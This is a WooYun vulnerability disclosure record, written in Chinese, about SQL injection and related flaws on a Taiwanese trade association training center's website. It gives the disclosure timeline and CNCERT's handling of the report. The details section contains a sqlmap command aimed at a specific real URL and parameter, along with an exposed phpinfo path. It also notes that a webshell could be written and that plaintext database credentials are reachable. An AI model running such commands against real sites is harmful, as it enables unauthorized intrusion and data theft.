漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-020983
漏洞标题:中华人民共和国台湾省外贸协会培训中心注入等多个漏洞
相关厂商:中华人民共和国台湾省外贸协会
漏洞作者: 楚无伤
提交时间:2013-03-31 00:07
修复时间:2013-05-15 00:08
公开时间:2013-05-15 00:08
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-31: 细节已通知厂商并且等待厂商处理中
2013-04-01: 厂商已经确认,细节仅向厂商公开
2013-04-11: 细节向核心白帽子及相关领域专家公开
2013-04-21: 细节向普通白帽子公开
2013-05-01: 细节向实习白帽子公开
2013-05-15: 细节向公众公开
简要描述:
民國六、七十年代我國經濟蓬勃發展,每年進出口快速成長。為因應當時國內業者對進出口人才之迫切需求,且鑑於國內制式教育體系下,經貿與外語之訓練無法緊密結合,行政院乃於民國75年核定由經濟部委託外貿協會辦理貿易人才培訓工作。在時任經濟部次長王建煊大力支持下,外貿協會廣邀產、官、學界代表及專家學者多次研議,釐訂訓練結構,成立了『貿易人才培訓中心』,開始『貿易人才養成班』之運作,每年定期招收大專畢業青年,施以為期二年之密集訓練。自此,外貿協會由原有不定期對國內業者辦理各項短期進出口課程之『在職訓練』,邁入了規劃長期課程之『職前訓練』領域;同時在硬體的經營上也由外貿協會座落於台北世貿中心辦理在職訓練之各項課程,進而擴展到位於新竹光復路之經濟部專業人員訓練中心、及東山街之東山文教院,辦理住宿、密集之貿易人才養成之培訓工作。
详细说明:
1、注入点
python sqlmap/sqlmap.py -u "http://www.iti.org.tw/app/course.bak?are
a=%5c&EndDate%5b%5d=0&key=1&StartDate%5b%5d=0&time=1"
2、PHPINFO
http://www.iti.org.tw/setup/phpinfo.php
3、有路径,有注入,可写入webshell,同时也是DBA权限。且在http://www.iti.org.tw/setup/下给出了明文的数据库账号和密码
漏洞证明:
修复方案:
版权声明:转载请注明来源 楚无伤@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2013-04-01 23:34
厂商回复:
CNVD确认并复现所述情况,已转报CNCERT,由CNCERT在近日正式通报对岸CERT TWNCERT。
按多个漏洞进行评分,rank=10+3=13
最新状态:
暂无